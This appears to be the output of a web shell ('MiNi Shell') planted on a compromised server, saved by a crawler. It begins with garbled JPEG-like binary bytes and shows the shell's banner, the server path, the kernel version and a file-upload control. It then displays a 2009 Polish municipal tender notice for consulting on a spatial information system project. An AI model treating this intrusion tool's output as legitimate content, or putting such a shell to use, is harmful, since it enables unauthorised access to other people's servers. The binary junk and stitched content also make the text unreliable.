JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091020/183177-N-2009.html

<p class="kh_header"><b>Ruda Śląska: Usługi doradcze w zakresie opracowania elementów dokumentacji przetargowej oraz zapewnienia jakości rezultatów i produktów dla projektu Budowa Publicznego Systemu Informacji Przestrzennej Miasta Ruda Śląska (projekt PSIP)</b><br>
<b>Numer ogłoszenia: 183177 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Ruda Śląska , Plac Jana Pawła II 6, 41-709 Ruda Śląska, woj. śląskie, tel. 032 2486281 do 9; 2449094, faks 032 248 7348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ruda-sl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi doradcze w zakresie opracowania elementów dokumentacji przetargowej oraz zapewnienia jakości rezultatów i produktów dla projektu Budowa Publicznego Systemu Informacji Przestrzennej Miasta Ruda Śląska (projekt PSIP).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usług obejmuje działania Wykonawcy (inaczej Konsultanta) związane z wspomaganiem Zamawiającego na etapie przeprowadzenia postępowań przetargowych dla projektu Budowa Publicznego Systemu Informacji Przestrzennej Miasta Ruda Śląska (PSIP) oraz na etapie realizacji projektu mające na celu zapewnienie jakości rezultatów oraz produktów projektu PSIP. 

Celem usług świadczonych w zakresie zapewnienia jakości jest:
1 ograniczenie ryzyka, że:
1.1 realizacja projektu odbywać się będzie niezgodnie z zapisami umowy lub innymi dokumentami kontraktowymi, a w szczególności będzie niezgodna lub będzie odbiegać od ustalonych i przyjętych standardów technologicznych wykonania przedmiotu projektu PSIP,
1.2 projekt przyniesie mniejsze niż oczekiwano rezultaty i nie zaspokoi istotnych wymagań funkcjonalnych oraz potrzeb Zamawiającego i nie zapewni uzyskania przyjętych dla projektu wskaźników,
2 eliminowanie czynników ryzyka poprzez wczesną ich identyfikację, 
3 wdrażanie w uzgodnieniu z Zamawiającym oraz Wykonawcą stosownych działań korygujących.

Działania Konsultanta w zakresie wspomagania Zamawiającego na etapie przeprowadzenia postępowań przetargowych obejmują:

1 Opracowanie elementów dokumentacji przetargowej na podstawie dokumentacji projektu Budowa Publicznego Systemu Informacji Przestrzennej Miasta Ruda Śląska(PSIP), w tym w szczególności Studium Wykonalności, których zapisy będą rozwinięciem tez zawartych w Studium Wykonalności w następującym zakresie:

1.1 część formalna SIWZ (na podstawie wzoru obowiązującego u Zamawiającego wzorca),
1.2 wymagania (warunki) techniczne,
1.3 zakres dostaw i usług,
1.4 wstępny harmonogram realizacji,
1.5 oszacowanie wartości zamówienia,
1.6 organizację procesu wdrożenia,
1.7 wybór i uzasadnienie trybu zamówienia publicznego,
1.8 niezbędne, konieczne wymagania w stosunku do Wykonawcy-Wykonawców
1.9 kryteria oceny ofert wraz z opisem metody pozwalającej na jednoznaczne wskazanie najkorzystniejszej oferty,
1.10 przygotowanie projektów umów zawierających co najmniej:
1.10.1 określenie kryteriów odbioru produktów i usług będących przedmiotem planowanego zamówienia,
1.10.2 zasady kontroli i monitorowania postępu prac w odniesieniu do przyjętego harmonogramu,
1.10.3 szczegółowe zobowiązania Wykonawcy-Wykonawców oraz Zamawiającego,
1.10.4 zasady zabezpieczenia poufności danych i informacji znajdujących się w posiadaniu Zamawiającego, a będących przedmiotem prac Wykonawcy-Wykonawców w ramach planowanego przedsięwzięcia,
1.10.5 zasady opieki gwarancyjnej oraz serwisowej,
1.10.6 inne uwarunkowania, określone przez Strony, jako konieczne do uwzględnienia w realizacji planowanego zamówienia np. zabezpieczenie kodów źródłowych, warunki licencyjne.
2 Udział w pracach komisji przetargowej Zamawiającego (1-2 spotkania), 
3 Opracowywanie odpowiedzi na zapytania Wykonawcy-Wykonawców do treści specyfikacji SIWZ).

Działania Konsultanta mające na celu zapewnienie jakości rezultatów oraz produktów projektu PSIP obejmują:

1 Przygotowanie organizacji projektu zgodnie z dokumentacją projektu oraz na podstawie zaleceń poprzez:
1.1 opracowanie Planu Realizacji Projektu zawierającego:
1.1.1 uszczegółowienie założeń oraz wymagań do architektury technicznej systemu (główne założenia do warunków technicznych dla dokumentacji przetargowej), w tym właściwy dobór technologii informatycznych stosowanych w projekcie, zgodnie z warunkami technicznymi określonymi w studium wykonalności oraz z zachowaniem reguł neutralności technologicznej, jak również z uwzględnieniem aktualnych uwarunkowań wykonawczych wynikających ze stanu posiadanych przez Zamawiającego licencji oprogramowania oraz sprzętu komputerowego, 
1.1.2 identyfikację ograniczeń wykonawczych, projektowych, technicznych, prawnych i organizacyjnych związanych z realizacją Projektu,
1.1.3 Plan Jakości, w tym:
1.1.3.1 kryteria i standardy wykonawcze dla każdej kategorii świadczeń Wykonawcy-Wykonawców tj. usług i dostaw, 
1.1.3.2 plan kontroli jakości, 
1.1.3.3 analizę ryzyka, w tym zalecenia dotyczące prowadzenia rejestru zagrożeń oraz koniecznych działań mających na celu ich zminimalizowanie lub usunięcie, 
1.1.4 harmonogram realizacji Projektu zawierający:
1.1.4.1 zaktualizowany harmonogram wykonawczy: etapów, zadań i podzadań Projektu uwzględniający działania Stron oraz punkty kontrolne i działania wspólne: testy, odbiory i inne,
1.1.4.2 harmonogram organizacji Projektu, w tym w szczególności współpracy z Zamawiającym (typ i częstotliwości spotkań),
1.2 zasady zarządzania Projektem w tym: 
1.2.1 propozycje organizacji projektu uwzględniające wszystkich uczestników Projektu  tj. Zamawiającego, Wykonawcy-Wykonawców, Konsultanta,  a w szczególności zasady współpracy z Zamawiającym (np. organizacja Biura Projektu, Komitet Sterujący, inne),  
1.2.2 dobór lub wskazania metodyki zarządzania projektem lub opcjonalnie określenie rozwiązania alternatywnego przez dobór metod  i technik zarządzania zapewniających osiągnięcie przez Zamawiającego celów Projektu, przy czym rozwiązanie alternatywne musi: 
1.2.2.1 zawierać  metody i techniki w zakresie zarządzania: komunikacją, planowaniem i realizacją, zmianami, ryzykiem, problemami, w tym zasady ich dokumentowania, 
1.2.2.2 opierać się na co najmniej jednym dokumencie zarządczym lub zbiorze takich dokumentów, w których uwzględnione zostaną reguły zarządzania wskazane powyżej,  
1.2.2.3 uwzględniać uwarunkowania prawne (umowy Stron), wykonawcze i organizacyjne, 
1.2.2.4 zakres zadań po stronie Wykonawcy-Wykonawców z opcją oczekiwanego i uzasadnionego przeniesienia części zadań dotyczących zarządzania projektem na Wykonawcę-Wykonawców Projektu w zakresie związanym nie tylko z zadaniami bezpośrednio wykonawczymi, 
1.2.2.5 zasady wdrożenia procedur organizacji Projektu oraz wzory dokumentów niezbędnych do prawidłowego wykonania Projektu, w tym administrowania Projektem we współpracy z Zamawiającym, inne istotne uwarunkowania jak: reguły prowadzenia przeglądów jakości, plan testów, odbiorów produktów i etapów oraz warunków przekazania do eksploatacji oraz utrzymania rezultatów wdrożenia systemu.
2 Opiniowanie i projektowanie zapisów umowy, aneksów lub innych istotnych dokumentów mających kluczowe znaczenie dla przebiegu projektu PSIP,
3 Opiniowanie wynikowej dokumentacji projektowej,
4 Przeprowadzenie przeglądu jakości i opracowanie na podstawie jego wyniku raportu oraz zaleceń w celu wprowadzenia ewentualnych, koniecznych działań korygujących,
5 Udział w spotkaniach zarządczych na szczeblu strategicznym projektu oraz udział w kluczowych spotkaniach problemowych (1-2 spotkania w miesiącu),
6 Zapewnienie jakości projektu zgodnie z Planem Jakości
7 Wspomaganie Koordynatora Projektu ze strony Zamawiającego w zakresie działań zarządczych przez:
7.1 opracowywanie projektów pism i dokumentów, 
7.2 reprezentowanie interesów Zamawiającego w bezpośrednich kontaktach z pracownikami Wykonawcy-Wykonawców, 
7.3 nadzorowanie zgodności przebiegu projektu z harmonogramem, 
7.4 egzekwowanie rezultatów projektu od Wykonawcy-Wykonawców, 
7.5 prowadzenie analizy ryzyka projektu, 
7.6 udział w procedurach odbioru produktów projektu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.22.40.00-1, 72.22.42.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki z art. 22 ust. 1 ustawy, tj:
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają taki obowiązek oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy.
1.2. Posiadają niezbędną wiedzę i doświadczenie, oraz dysponują lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
1.2.1. Wykonawca musi wykazać, iż w ostatnich 3 latach przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:

- jedną usługę polegającą na wspomaganiu Zamawiającego w prowadzeniu i rozliczaniu projektu informatycznego współfinansowanego ze środków pomocy unijnej z funduszy strukturalnych ZPORR lub RPO lub środków pomocy przed akcesyjnej PHARE, przy czym projekt informatyczny Zamawiającego obejmował kwotę łączną brutto nie mniejszą niż 2 500 000 złotych,

- trzy usługi polegające na opracowaniu dokumentacji przetargowej w zakresie warunków technicznych, kryteriów dopuszczenia Wykonawców do udziału w postępowaniu, kryteriów wyboru najkorzystniejszej oferty oraz wzoru umowy, dotyczących dostaw sprzętu, usług i oprogramowania na potrzeby wdrożenia systemu informatycznego klasy GIS (SIP, SIT),

- dwie usługi dotyczące wdrożenia systemu informatycznego klasy GIS (SIP, SIT) lub opracowaniu dokumentacji technicznej lub studium wykonalności lub dokumentacji przetargowej systemu informatycznego klasy GIS (SIP, SIT),

- jedną usługę polegającą na świadczeniu usług związanych z zapewnieniem określonych kryteriów jakości dla danego zamówienia.


Uwaga: Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym tj. spełnia - nie spełnia); nie spełnienie chociażby jednego z postawionych warunków udziału w postępowaniu, spowoduje wykluczenie wykonawcy z postępowania.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia publicznego o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz niepodleganiu wyklucczeniu z postępowania.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej.
Dokument, o którym wyżej mowa uważa się za aktualny, w przypadku jego wystawienia lub potwierdzenia jego aktualności przez organ wydający, nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Wykaz wykonanych, usług w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielnie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.
4.  Dokumenty (np. referencje) potwierdzające, że usługi o których wyżej mowa, zostały wykonane należycie.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.rudaslaska.bip.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Ruda Śląska, plac Jana Pawła II 6, 41-709 Ruda Śląska, budynek A - III piętro, pokój 309 - Wydział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2009 godzina 11:30, miejsce: Urzad Miasta Ruda Śląska, plac Jana Pawła II 6, 41-709 Ruda Śląska, budynek A - III piętro, pokój 309 - Wydział Zamówień Publicznych.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający zastrzega sobie prawo do udzielenia zamówień uzupełniajacych, o których mowa w art. 67 ust. 1 pkt 6 ustawy (maksymalnie do 50% wartości zamówienia).

Creat By MiNi SheLL
Email: jattceo@gmail.com